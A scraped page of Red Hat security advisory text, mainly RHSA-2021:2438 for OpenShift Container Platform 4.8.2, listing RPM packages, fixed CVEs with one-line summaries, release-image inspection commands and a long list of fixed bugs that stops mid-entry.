x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. These packages include redhat-release-virtualization-host. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Bug Fix(es):

  • xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count (BZ#1949916)

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Ansible is a SSH-based configuration management, deployment, and task execution system. The openshift-ansible packages contain Ansible code and playbooks for installing and upgrading OpenShift Container Platform 3. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.

Bug Fix(es):

  • kernel-rt: update RT source tree to the RHEL-8.3.z source tree (BZ#1957359)

  • Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.8.2 bug fix and security update Advisory ID: RHSA-2021:2438-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:2438 Issue date: 2021-07-27 CVE Names: CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 CVE-2021-33909 =====================================================================

  1. Summary:

Red Hat OpenShift Container Platform release 4.8.2 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.8.2. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2021:2437

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel ease-notes.html

Security Fix(es):

  • SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) (CVE-2016-2183)

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

  • nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)

  • etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)

  • etcd: DoS in wal/wal.go (CVE-2020-15112)

  • etcd: directories created via os.MkdirAll are not checked for permissions (CVE-2020-15113)

  • etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS (CVE-2020-15114)

  • etcd: no authentication is performed against endpoints provided in the

  • --endpoints flag (CVE-2020-15136)

  • jwt-go: access restriction bypass vulnerability (CVE-2020-26160)

  • nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)

  • nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)

  • golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)

  • golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)

  • containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206)

  • containers/storage: DoS via malicious image (CVE-2021-20291)

  • prometheus: open redirect under the /new endpoint (CVE-2021-29622)

  • golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)

  • go.elastic.co/apm: leaks sensitive HTTP headers during panic (CVE-2021-22133)

Space precludes listing in detail the following additional CVEs fixes: (CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382), (CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and (CVE-2021-23368)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-x86_64

The image digest is ssha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-s390x

The image digest is sha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le

The image digest is sha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f

All OpenShift Container Platform 4.8 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor

  1. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster - -cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1725981 - oc explain does not work well with full resource.group names 1747270 - [osp] Machine with name "-worker"couldn't join the cluster 1772993 - rbd block devices attached to a host are visible in unprivileged container pods 1786273 - [4.6] KAS pod logs show "error building openapi models ... has invalid property: anyOf" for CRDs 1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts 1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header 1812212 - ArgoCD example application cannot be downloaded from github 1817954 - [ovirt] Workers nodes are not numbered sequentially 1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole 1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server" 1825417 - The containerruntimecontroller doesn't roll back to CR-1 if we delete CR-2 1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades 1835264 - Intree provisioner doesn't respect PVC.spec.dataSource sometimes 1839101 - Some sidebar links in developer perspective don't follow same project 1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes 1846875 - Network setup test high failure rate 1848151 - Console continues to poll the ClusterVersion resource when the user doesn't have authority 1850060 - After upgrading to 3.11.219 timeouts are appearing. 1852637 - Kubelet sets incorrect image names in node status images section 1852743 - Node list CPU column only show usage 1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values 1857008 - [Edge] [BareMetal] Not provided STATE value for machines 1857477 - Bad helptext for storagecluster creation 1859382 - check-endpoints panics on graceful shutdown 1862084 - Inconsistency of time formats in the OpenShift web-console 1864116 - Cloud credential operator scrolls warnings about unsupported platform 1866222 - Should output all options when runing operator-sdk init --help 1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard 1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert 1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions 1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host 1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions 1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go 1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS 1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag 1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method 1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics 1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly 1872659 - ClusterAutoscaler doesn't scale down when a node is not needed anymore 1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack 1873649 - proxy.config.openshift.io should validate user inputs 1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials 1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable 1876918 - scheduler test leaves taint behind 1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1 1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable 1878685 - Ingress resource with "Passthrough" annotation does not get applied when using the newer "networking.k8s.io/v1" API 1879077 - Nodes tainted after configuring additional host iface 1879140 - console auth errors not understandable by customers 1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens 1879184 - CVO must detect or log resource hotloops 1879495 - [4.6] namespace \“openshift-user-workload-monitoring\” does not exist” 1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1879944 - [OCP 4.8] Slow PV creation with vsphere 1880757 - AWS: master not removed from LB/target group when machine deleted 1880758 - Component descriptions in cloud console have bad description (Managed by Terraform) 1881210 - nodePort for router-default metrics with NodePortService does not exist 1881481 - CVO hotloops on some service manifests 1881484 - CVO hotloops on deployment manifests 1881514 - CVO hotloops on imagestreams from cluster-samples-operator 1881520 - CVO hotloops on (some) clusterrolebindings 1881522 - CVO hotloops on clusterserviceversions packageserver 1881662 - Error getting volume limit for plugin kubernetes.io/ in kubelet logs 1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io 1881938 - migrator deployment doesn't tolerate masters 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883587 - No option for user to select volumeMode 1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine 1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster 1884800 - Failed to set up mount unit: Invalid argument 1885186 - Removing ssh keys MC does not remove the key from authorized_keys 1885349 - [IPI Baremetal] Proxy Information Not passed to metal3 1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses 1886572 - auth: error contacting auth provider when extra ingress (not default) goes down 1887849 - When creating new storage class failure_domain is missing. 1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs 1889689 - AggregatedAPIErrors alert may never fire 1890678 - Cypress: Fix 'structure' accesibility violations 1890828 - Intermittent prune job failures causing operator degradation 1891124 - CP Conformance: CRD spec and status failures 1891301 - Deleting bmh by "oc delete bmh' get stuck 1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass 1891766 - [LSO] Min-Max filter's from OCS wizard accepts Negative values and that cause PV not getting created 1892642 - oauth-server password metrics do not appear in UI after initial OCP installation 1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version 1893850 - Add an alert for requests rejected by the apiserver 1893999 - can't login ocp cluster with oc 4.7 client without the username 1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion 1895053 - Allow builds to optionally mount in cluster trust stores 1896226 - recycler-pod template should not be in kubelet static manifests directory 1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name 1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install 1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout 1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1899057 - fix spurious br-ex MAC address error log 1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay 1899587 - [External] RGW usage metrics shown on Object Service Dashboard is incorrect 1900454 - Enable host-based disk encryption on Azure platform 1900819 - Scaled ingress replicas following sharded pattern don't balance evenly across multi-AZ 1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed 1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API 1901648 - "do you need to set up custom dns" tooltip inaccurate 1902003 - Jobs Completions column is not sorting when there are "0 of 1" and "1 of 1" in the list. 1902076 - image registry operator should monitor status of its routes 1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given 1903228 - Pod stuck in Terminating, runc init process frozen 1903383 - Latest RHCOS 47.83. builds failing to install: mount /root.squashfs failed 1903553 - systemd container renders node NotReady after deleting it 1903700 - metal3 Deployment doesn't have unique Pod selector 1904006 - The --dir option doest not work for command oc image extract 1904505 - Excessive Memory Use in Builds 1904507 - vsphere-problem-detector: implement missing metrics 1904558 - Random init-p error when trying to start pod 1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests 1905147 - ConsoleQuickStart Card's prerequisites is a combined text instead of a list 1905159 - Installation on previous unused dasd fails after formatting 1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory 1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails 1905577 - Control plane machines not adopted when provisioning network is disabled 1905627 - Warn users when using an unsupported browser such as IE 1905709 - Machine API deletion does not properly handle stopped instances on AWS or GCP 1905849 - Default volumesnapshotclass should be created when creating default storageclass 1906056 - Bundles skipped via the skips field cannot be pinned 1906102 - CBO produces standard metrics 1906147 - ironic-rhcos-downloader should not use --insecure 1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart 1906740 - [aws]Machine should be "Failed" when creating a machine with invalid region 1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage 1907315 - the internal load balancer annotation for AWS should use "true" instead of "0.0.0.0/0" as value 1907353 - [4.8] OVS daemonset is wasting resources even though it doesn't do anything 1907614 - Update kubernetes deps to 1.20 1908068 - Enable DownwardAPIHugePages feature gate 1908169 - The example of Import URL is "Fedora cloud image list" for all templates. 1908170 - sriov network resource injector: Hugepage injection doesn't work with mult container 1908343 - Input labels in Manage columns modal should be clickable 1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures 1908655 - "Evaluating rule failed" for "record: node:node_num_cpu:sum" rule 1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes 1908765 - [SCALE] enable OVN lflow data path groups 1908774 - [SCALE] enable OVN DB memory trimming on compaction 1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it 1909091 - Pod/node/ip/template isn't showing when vm is running 1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error 1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing 1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade 1910067 - UPI: openstacksdk fails on "server group list" 1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing 1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn't match node selector: AWS compute machines without status 1910378 - socket timeouts for webservice communication between pods 1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling 1910500 - Could not list CSI provisioner on web when create storage class on GCP platform 1911211 - Should show the cert-recovery-controller version correctly 1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames 1912571 - libvirt: Support setting dnsmasq options through the install config 1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1913112 - BMC details should be optional for unmanaged hosts 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag 1913341 - GCP: strange cluster behavior in CI run 1913399 - switch to v1beta1 for the priority and fairness APIs 1913525 - Panic in OLM packageserver when invoking webhook authorization endpoint 1913532 - After a 4.6 to 4.7 upgrade, a node went unready 1913974 - snapshot test periodically failing with "can't open '/mnt/test/data': No such file or directory" 1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs 1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root 1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20 1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names 1915693 - Not able to install gpu-operator on cpumanager enabled node. 1915971 - Role and Role Binding breadcrumbs do not work as expected 1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page 1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1916392 - scrape priority and fairness endpoints for must-gather 1916450 - Alertmanager: add title and text fields to Adv. config. section of Slack Receiver form 1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with "Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready" 1916553 - Default template's description is empty on details tab 1916593 - Destroy cluster sometimes stuck in a loop 1916872 - need ability to reconcile exgw annotations on pod add 1916890 - [OCP 4.7] api or api-int not available during installation 1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. 1917282 - [Migration] MCO stucked for rhel worker after enable the migration prepare state 1917328 - It should default to current namespace when create vm from template action on details page 1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with "cannot go from state 'deploy failed' to state 'manageable'" 1917485 - [oVirt] ovirt machine/machineset object has missing some field validations 1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. 1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library 1918101 - [vsphere]Delete Provisioning machine took about 12 minutes 1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass 1918442 - Service Reject ACL does not work on dualstack 1918723 - installer fails to write boot record on 4k scsi lun on s390x 1918729 - Add hide/reveal button for the token field in the KMS configuration page 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1918785 - Pod request and limit calculations in console are incorrect 1918910 - Scale from zero annotations should not requeue if instance type missing 1919032 - oc image extract - will not extract files from image rootdir - "error: unexpected directory from mapping tests.test" 1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0 1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure dnsZone 1919168 - oc adm catalog mirror doesn't work for the air-gapped cluster 1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize 1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster 1919356 - Add missing profile annotation in cluster-update-keys manifests 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic 1919406 - OperatorHub filter heading "Provider Type" should be "Source" 1919737 - hostname lookup delays when master node down 1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade 1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests 1920300 - cri-o does not support configuration of stream idle time 1920307 - "VM not running" should be "Guest agent required" on vm details page in dev console 1920532 - Problem in trying to connect through the service to a member that is the same as the caller. 1920677 - Various missingKey errors in the devconsole namespace 1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources 1920901 - [4.7]"500 Internal Error" for prometheus route in https_proxy cluster 1920903 - oc adm top reporting unknown status for Windows node 1920905 - Remove DNS lookup workaround from cluster-api-provider 1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard 1921184 - kuryr-cni binds to wrong interface on machine with two interfaces 1921227 - Fix issues related to consuming new extensions in Console static plugins 1921264 - Bundle unpack jobs can hang indefinitely 1921267 - ResourceListDropdown not internationalized 1921321 - SR-IOV obliviously reboot the node 1921335 - ThanosSidecarUnhealthy 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel] 1921763 - operator registry has high memory usage in 4.7... cleanup row closes 1921778 - Push to stage now failing with semver issues on old releases 1921780 - Search page not fully internationalized 1921781 - DefaultList component not internationalized 1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes 1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often 1921892 - MAO: controller runtime manager closes event recorder 1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated 1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label 1921953 - ClusterServiceVersion property inference does not infer package and version 1922063 - "Virtual Machine" should be "Templates" in template wizard 1922065 - Rootdisk size is default to 15GiB in customize wizard 1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch 1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted 1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt 1922646 - Panic in authentication-operator invoking webhook authorization 1922648 - FailedCreatePodSandBox due to "failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists" 1922764 - authentication operator is degraded due to number of kube-apiservers 1922992 - some button text on YAML sidebar are not translated 1922997 - [Migration]The SDN migration rollback failed. 1923038 - [OSP] Cloud Info is loaded twice 1923157 - Ingress traffic performance drop due to NodePort services 1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set. 1923811 - Registry claims Available=True despite .status.readyReplicas == 0 while .spec.replicas == 2 1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors 1923984 - Incorrect anti-affinity for UWM prometheus 1924020 - panic: runtime error: index out of range [0] with length 0 1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true 1924083 - "Activity" Pane of Persistent Storage tab shows events related to Noobaa too 1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable 1924171 - ovn-kube must handle single-stack to dual-stack migration 1924358 - metal UPI setup fails, no worker nodes 1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument 1924536 - 'More about Insights' link points to support link 1924585 - "Edit Annotation" are not correctly translated in Chinese 1924586 - Control Plane status and Operators status are not fully internationalized 1924641 - [User Experience] The message "Missing storage class" needs to be displayed after user clicks Next and needs to be rephrased 1924663 - Insights operator should collect related pod logs when operator is degraded 1924701 - Cluster destroy fails when using byo with Kuryr 1924728 - Difficult to identify deployment issue if the destination disk is too small 1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086) 1924747 - InventoryItem doesn't internationalize resource kind 1924788 - Not clear error message when there are no NADs available for the user 1924816 - Misleading error messages in ironic-conductor log 1924869 - selinux avc deny after installing OCP 4.7 1924916 - PVC reported as Uploading when it is actually cloning 1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces 1924953 - newly added 'excessive etcd leader changes' test case failing in serial job 1924968 - Monitoring list page filter options are not translated 1924983 - some components in utils directory not localized 1925017 - [UI] VM Details-> Network Interfaces, 'Name,' is displayed instead on 'Name' 1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -> 4.7 upgrade due to series churn 1925083 - Some texts are not marked for translation on idp creation page. 1925087 - Add i18n support for the Secret page 1925148 - Shouldn't create the redundant imagestream when use oc new-app --name=testapp2 -i with exist imagestream 1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard 1925216 - openshift installer fails immediately failed to fetch Install Config 1925236 - OpenShift Route targets every port of a multi-port service 1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload's service 1925261 - Items marked as mandatory in KMS Provider form are not enforced 1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot 1925343 - [ci] e2e-metal tests are not using reserved instances 1925493 - Enable snapshot e2e tests 1925586 - cluster-etcd-operator is leaking transports 1925614 - Error: InstallPlan.operators.coreos.com not found 1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers 1926029 - [RFE] Either disable save or give warning when no disks support snapshot 1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists. 1926072 - Close button (X) does not work in the new "Storage cluster exists" Warning alert message(introduced via fix for Bug 1867400) 1926082 - Insights operator should not go degraded during upgrade 1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized 1926115 - Texts in “Insights” popover on overview page are not marked for i18n 1926123 - Pseudo bug: revert "force cert rotation every couple days for development" in 4.7 1926126 - some kebab/action menu translation issues 1926131 - Add HPA page is not fully internationalized 1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a 